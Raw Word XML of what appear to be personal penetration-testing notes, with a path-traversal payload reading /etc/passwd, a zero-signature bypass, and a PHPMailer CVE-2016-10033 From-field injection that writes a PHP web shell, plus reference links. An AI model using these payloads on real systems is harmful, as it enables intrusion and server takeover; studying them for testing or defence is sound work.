    <w:p w14:paraId="2A540A18" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4BDDC1" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Content-Length: 192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751416F4" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0286F136" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC17F7C" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE04BA9" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004480CE" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A70430" w14:textId="0C42DCE0" w:rsidR="00200972" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{ "token": "Tzo0OiJVc2VyIjoyOntzOjI6ImlkIjtpOjE7czo1OiJsb2dpbiI7czo2OiJhaXF5ZnciO30%3D--05b4f8179fe42009e892e43118ac778f", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/../../../../../../../../../.././../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">", "sig": </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C202ADA" w14:textId="7918F736" w:rsidR="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD0C2EF" w14:textId="6129B506" w:rsidR="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E05D08B" wp14:editId="78E8D9A2">
            <wp:extent cx="5943600" cy="2012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9002" w14:textId="1B2B54A0" w:rsidR="00C11729" w:rsidRDefault="00C11729" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685A44EE" w14:textId="6A135140" w:rsidR="00C11729" w:rsidRDefault="00C11729" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C49D9E" w14:textId="77777777" w:rsidR="00C11729" w:rsidRDefault="00C11729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0220E895" w14:textId="0A5A8A48" w:rsidR="00C11729" w:rsidRPr="005F29D4" w:rsidRDefault="00C11729" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F29D4">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CVE-2016-10033: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F29D4">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PHPMailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F29D4">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77ADB8" w14:textId="60504335" w:rsidR="00C744C2" w:rsidRDefault="00C744C2" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFD6D87" w14:textId="0E1E50C0" w:rsidR="00AC75B1" w:rsidRDefault="00AC75B1" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>Payload to email send and can be injected in From field in form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C683B42" w14:textId="4F2C1FA8" w:rsidR="00C744C2" w:rsidRDefault="00ED2B34" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>attacker</w:t>
        </w:r>
        <w:r w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>@127.0.0.1\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>oQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>/ -X/var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C744C2">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root”@127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC74F1D" w14:textId="7B32F8A1" w:rsidR="00385F1A" w:rsidRDefault="00385F1A" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D79244F" w14:textId="7C078168" w:rsidR="00385F1A" w:rsidRDefault="00385F1A" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385F1A">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="171607D0" wp14:editId="7775C4B0">
            <wp:extent cx="5943600" cy="92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5B28" w14:textId="5A41E86B" w:rsidR="00385F1A" w:rsidRDefault="00385F1A" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7E3760" w14:textId="5594429C" w:rsidR="00385F1A" w:rsidRDefault="00385F1A" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00385F1A">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>attacker@127.0.0.1\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>” -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>oQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>/ -X/var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root”@127.0.0.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC437F" w14:textId="3E463D66" w:rsidR="004B4ECD" w:rsidRDefault="004B4ECD" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27AE38DD" w14:textId="11F3B7E9" w:rsidR="004B4ECD" w:rsidRDefault="004B4ECD" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE32D0D" w14:textId="02D79B16" w:rsidR="004B4ECD" w:rsidRDefault="004B4ECD" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://github.com/pnagasaikiran/private-notes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C263981" w14:textId="77777777" w:rsidR="005F29D4" w:rsidRDefault="005F29D4" w:rsidP="005F29D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D415405" w14:textId="28756EBE" w:rsidR="00C11729" w:rsidRPr="005F29D4" w:rsidRDefault="005F29D4" w:rsidP="005F29D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F29D4">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CVE-2016-2098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF07A5" w14:textId="788A971C" w:rsidR="00C11729" w:rsidRDefault="005F29D4" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F29D4">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ref link : </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00FE5AA5" w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://github.com/j4k0m/CVE-2016-2098</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FE5AA5">
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D41431" w14:textId="1E1781EE" w:rsidR="002C0B05" w:rsidRDefault="002C0B05" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E0511F" w14:textId="2600F966" w:rsidR="002C0B05" w:rsidRPr="002C0B05" w:rsidRDefault="002C0B05" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C0B05">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Play Session Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BF3" w14:textId="72DBCE19" w:rsidR="002C0B05" w:rsidRDefault="002C0B05" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757E9774" w14:textId="3673079C" w:rsidR="002C0B05" w:rsidRPr="005F29D4" w:rsidRDefault="002C0B05" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="009D750E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://f4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-play-session-injection/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C0B05" w:rsidRPr="005F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umar Narayana Gundmi, Adithya Kumar N G" w:date="2023-08-24T17:33:00Z" w:initials="AK">
    <w:p w14:paraId="3B31592E" w14:textId="2A8F5EA8" w:rsidR="007B10BA" w:rsidRDefault="007B10BA">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Add or remove</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/ until get output</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Kumar Narayana Gundmi, Adithya Kumar N G" w:date="2023-08-24T17:34:00Z" w:initials="AK">
    <w:p w14:paraId="592F2FA4" w14:textId="7506F342" w:rsidR="007B10BA" w:rsidRDefault="007B10BA">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use 0 for sign check if app is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it does pass check with 0</w:t>
      </w:r>
      <w:r w:rsidR="00A11F94">
        <w:t>. As zero may loosely equal to signature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31592E" w15:done="0"/>
  <w15:commentEx w15:paraId="592F2F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212F8" w16cex:dateUtc="2023-08-24T12:03:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="28921311" w16cex:dateUtc="2023-08-24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31592E" w16cid:durableId="289212F8"/>
  <w16cid:commentId w16cid:paraId="592F2FA4" w16cid:durableId="289213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5A59" w14:textId="77777777" w:rsidR="00EA3B40" w:rsidRDefault="00EA3B40" w:rsidP="00C2627A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4776288E" w14:textId="77777777" w:rsidR="00EA3B40" w:rsidRDefault="00EA3B40" w:rsidP="00C2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C8B2" w14:textId="77777777" w:rsidR="00EA3B40" w:rsidRDefault="00EA3B40" w:rsidP="00C2627A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B12E7EA" w14:textId="77777777" w:rsidR="00EA3B40" w:rsidRDefault="00EA3B40" w:rsidP="00C26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B6C33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2216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39E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8F0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8651E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEF8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32406">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="738597566">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="17227040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mar Narayana Gundmi, Adithya Kumar N G">
    <w15:presenceInfo w15:providerId="None" w15:userId="Kumar Narayana Gundmi, Adithya Kumar N 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7A"/>
    <w:rsid w:val="00004065"/>
    <w:rsid w:val="00022DE7"/>
    <w:rsid w:val="000C0C19"/>
    <w:rsid w:val="000D1947"/>
    <w:rsid w:val="001655CA"/>
    <w:rsid w:val="00200972"/>
    <w:rsid w:val="002050B6"/>
    <w:rsid w:val="00262242"/>
    <w:rsid w:val="00266444"/>
    <w:rsid w:val="00283759"/>
    <w:rsid w:val="002C0B05"/>
    <w:rsid w:val="00385F1A"/>
    <w:rsid w:val="0041760B"/>
    <w:rsid w:val="004419B9"/>
    <w:rsid w:val="004B4ECD"/>
    <w:rsid w:val="004C72ED"/>
    <w:rsid w:val="004D77A8"/>
    <w:rsid w:val="0058541B"/>
    <w:rsid w:val="005A1796"/>
    <w:rsid w:val="005F29D4"/>
    <w:rsid w:val="00675827"/>
    <w:rsid w:val="00720952"/>
    <w:rsid w:val="007305ED"/>
    <w:rsid w:val="00792B3A"/>
    <w:rsid w:val="007B10BA"/>
    <w:rsid w:val="00826782"/>
    <w:rsid w:val="008918D7"/>
    <w:rsid w:val="008D310E"/>
    <w:rsid w:val="008E1322"/>
    <w:rsid w:val="00964087"/>
    <w:rsid w:val="00A11F94"/>
    <w:rsid w:val="00A445D7"/>
    <w:rsid w:val="00A951A8"/>
    <w:rsid w:val="00AC75B1"/>
    <w:rsid w:val="00B324B6"/>
    <w:rsid w:val="00B452E8"/>
    <w:rsid w:val="00BD3513"/>
    <w:rsid w:val="00C11729"/>
    <w:rsid w:val="00C2627A"/>
    <w:rsid w:val="00C744C2"/>
    <w:rsid w:val="00CC7644"/>
    <w:rsid w:val="00D12E69"/>
    <w:rsid w:val="00D36180"/>
    <w:rsid w:val="00D41FF1"/>
    <w:rsid w:val="00EA2120"/>
    <w:rsid w:val="00EA3B40"/>
    <w:rsid w:val="00ED2B34"/>
    <w:rsid w:val="00EF7D13"/>
    <w:rsid w:val="00F65A09"/>
    <w:rsid w:val="00FB6EDB"/>
    <w:rsid w:val="00FC5C61"/>
    <w:rsid w:val="00FE3240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E079A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FE97A9FE-F6CA-49E5-B487-6A069FB7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2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2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B1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0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0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0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yperlink" Target="https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilit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4l13n5n0w.github.io/blog/2015/05/09/pentesterlab-play-session-injection/" TargetMode="Externa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mailto:attacker@127.0.0.1\" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/j4k0m/CVE-2016-209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github.com/pnagasaikiran/private-n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usercontent.com/postmodern/4499206/raw/a68d6ff8c1f9570a09365036aeb96f6a9fff7121/rails_rce.rb" TargetMode="Externa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Narayana Gundmi, Adithya Kumar N G</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kumar Narayana Gundmi, Adithya Kumar N G</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-25T16:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-25T09:24:00Z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2023-07-25T16:59:36Z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3003f8a6-ea3f-493f-bf29-a8884f34a665</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_ea60d57e-af5b-4752-ac57-3e4f28ca11dc_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>